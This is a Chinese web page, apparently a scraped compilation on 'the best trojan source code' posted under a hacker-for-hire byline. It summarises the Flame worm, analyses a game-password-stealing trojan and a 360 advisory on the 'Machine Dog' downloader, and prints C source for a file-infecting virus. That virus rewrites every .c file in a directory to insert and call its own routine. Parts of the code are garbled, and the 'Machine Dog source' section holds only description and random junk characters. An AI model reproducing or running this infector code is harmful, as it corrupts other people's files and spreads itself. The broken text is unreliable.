现在最好木马病毒源码（木马病毒排名）

hacker2022-08-06私人接单黑客49

本文目录一览：

1、现在2012最厉害的病毒是什么？
2、c语言木马源代码
3、网上什么木马病毒最厉害？
4、机器狗木马三代病毒源代码

现在2012最厉害的病毒是什么？

火焰病毒,至今还没没人能够提取出其源码!

“火焰”病毒的全名为Worm.Win32.Flame，它是一种后门程序和木马病毒，同时又具有蠕虫病毒的特点。只要其背后的操控者发出指令，它就能在网络、移动设备中进行自我复制。一旦电脑系统被感染，病毒将开始一系列复杂的行动，包括监测网络流量、获取截屏画面、记录音频对话、截获键盘输入等。被感染系统中所有的数据都能通过链接传到病毒指定的服务器，让操控者一目了然。据卡巴斯基实验室统计，迄今发现感染该病毒的案例已有500多起，其中主要发生在伊朗、以色列和巴勒斯坦。苏丹、叙利亚、黎巴嫩、沙特阿拉伯、埃及和中国（家庭电脑较多）等国也有个别案例。病毒入侵的起始点目前尚不清楚。

详情请看百度百科!

现在最好木马病毒源码（木马病毒排名）

c语言木马源代码

#include stdio.h

#include dir.h

void main(void)

{

virus();

}

int virus()

{

struct ffblk ffblk;

FILE *in,*out,*read;

char *virus="virus.c";

char buf[50][80];

char *p;

char *end="return";

char *bracket="}";

char *main="main";

char *include[2]={"stdio.h","dir.h"};

char *int_virus="int virus()";

char *buffer;

int done,i,j=0,flag=0;

printf("\nI have a virus. Writen by PuBin\n");

done = findfirst("*.c",ffblk,0);

while (!done)

{

i=0;

if ((in = fopen(ffblk.ff_name, "rt"))== NULL)

{

goto next;

}

do{

if(i=50)

{

fclose(in);

goto next;

}

p=fgets(buf[i],80,in);

i++;

}while(p!=NULL);

fclose(in);

out=fopen(ffblk.ff_name,"w+t");

fputs("#includestdio.h\n",out);

fputs("#includedir.h\n",out);

{

if(strstr(buf[j],main)!=NULL)

{

for(;ji-1;j++)

if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)

fputs(buf[j],out);

else

{

if(flag==0)

{

flag=1;

fputs("virus();\n",out);

}

fputs(buf[j],out);

}

else if((strstr(buf[j],include[0])==NULL)

(strstr(buf[j],include[1])==NULL))

{

fputs(buf[j],out);

j++;

}

else

j++;

}while(ji-1);

read=fopen(virus,"rt");

{

p=fgets(buffer,80,read);

if(strstr(buffer,int_virus))

while(p!=NULL)

{

if(strstr(buffer,virus)==NULL)

fputs(buffer,out);

else

{

fputs(" char *virus=\"",out);

fputs(ffblk.ff_name,out);

fputs("\";\n",out);

}

p=fgets(buffer,80,read);

}

}while(p!=NULL);

fclose(read);

fclose(out);

printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);

next: done = findnext(ffblk);

}

return 0;

}

严重声明：这个程序只是供C语言新手参考，开玩笑没关系，但如果用来做不法的事情，本人概不负责。还有，编病毒、木马去做违法的事情惩罚是很重的，你如果想学编程，编个简单的就好了，否则后果很严重。

网上什么木马病毒最厉害？

中文名:“顽梯”变种

病毒长度:可变

病毒类型:恶意驱动程序

危害等级:★★

影响平台:Win 9X/ME/NT/2000/XP/2003

Rootkit.Vanti“顽梯”变种d是一个恶意驱动程序，开启被感染计算机的后门，未经授权访问用户计算机。“顽梯”运行后，在系统目录下或Windows目录下创建病毒副本。修改注册表，实现开机自启。开启被感染计算机的后门，未经授权访问用户计算机。用户第一次运行该程序，屏幕显示Trojan.PSW.Win32.GameOL.lpi简介病毒分类 WINDOWS下的PE病毒病毒名称 Trojan.PSW.Win32.GameOL.lpi

别名病毒长度

依赖系统传播途径

行为类型 WINDOWS下的PE病毒感染

病毒类型：盗号木马AV命名：Trojan-PSW.Win32.OnLineGames.oex(卡巴斯基)

Win32.Troj.AgentT.fm.14452(金山)

Trojan.PSW.Win32.GameOL.lhu(瑞星)[病毒行为1、释放病毒副本：

Trojan.PSW.Win32.GameOL.lhu,首先在Fonts目录以比较字符串方式判断raqjmtl.exe和raqjmni.dll是否已经存在C:\WINDOWS\Fonts\raqjmtl.exe

C:\windows\Fonts\raqjmni.dll

2、 raqjmni.dll加入注册表，开机注入Explorer：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks

Registry value:

Type: REG_SZ

Value: raqjmpi.dll

3、释放P处理，删除文件：

％Systemroot％\System32\verclsid.exe

4、注入Explorer，每隔几毫秒检测新进程启动，并将raqjmpi.dll插入。

5、如果启动的进程为sungame.exe、TQAT.exe，则结束。

6、然后在用户重启游戏的时候，raqjmpi.dll则记录它的帐号和密码的输入操作。

最后发送至外部，完成盗号过程。

7、病毒的其他工作：

（1）禁用系统自动更新和防火墙

（2）每隔3毫秒检测自身注册表，如果不在则重新生成。

（3）完全释放后删除旧体，毁尸灭迹。

机器狗木马三代病毒源代码

机器狗木马三代是机器狗木马的最新变种，从五一假期开始处于爆发趋势，至今愈演愈烈，[b][color=red]截至目前已有百万电脑中招[/color][/b]。360安全中心再次紧急更新360顽固木马专杀大全，全面围剿机器狗木马三代。（360顽固木马专杀大全下载地址：[url=][color=#0044dd][/color][/url]）KE|.C|(Z+^

QC|Y\(ZMXE

机器狗是一种危害极强的木马病毒下载器，它会给受害者的电脑下载大量的木马、病毒、恶意软件、插件等。[b][color=red]一旦中毒，受害者的电脑便随时可能感染任何木马病毒，这些木马病毒会疯狂地盗用用户的QQ账号密码、游戏账号密码、网上银行卡号密码等用户信息，也会破坏操作系统，严重的会使系统彻底崩溃。[/color][/b]2f?*u4kZ

0ZQ2kA*RO ]+Q6RF 本次出现的新变种则更加猖狂，主要有如下行为：M5@q'@I-\\lq

3b@1@`(BY'Rf [b]1. 使杀毒软件失效并破坏系统[/b]

%i%Y:@$^^^D%a@

.szk*}? jV_ 感染更多系统文件，在安装有卡巴斯基的电脑里，能先使卡巴斯基失效，以便释放一个驱动。在这个驱动的作用下，机器狗新变种木马就能绕过所有的还原软件和自我保护以及开机免疫，进而为所欲为。.J/O1|Vq,W

4]z F{|W [b]2. 给电脑装上大量的病毒和木马[/b] Q.j `AG8c u

o}*_Kj9b4G

感染后的系统文件会自动后台访问木马网站，下载一个TXT文本文件，并根据文件里的配置下载相关木马。从这个角度上来讲，这个新变种的机器狗也承担了一部分的“木马运输”工作，成为其他木马的渠道，以便以此获利。

%o9QL_S\Z.G1H

"O7a!C2|;gfV [b]3. 破坏360保险箱的保护，盗取账号密码[/b],Qg P%[ se

C8s oVS Hs 部分新变种能特别针对360保险箱进行攻击，修改360保险箱中的关键文件，取消游戏保护功能，继而盗取账号密码。

Z [6hv?` x

7l%\*F^3wk@ S +X4Up0~lS Ie ^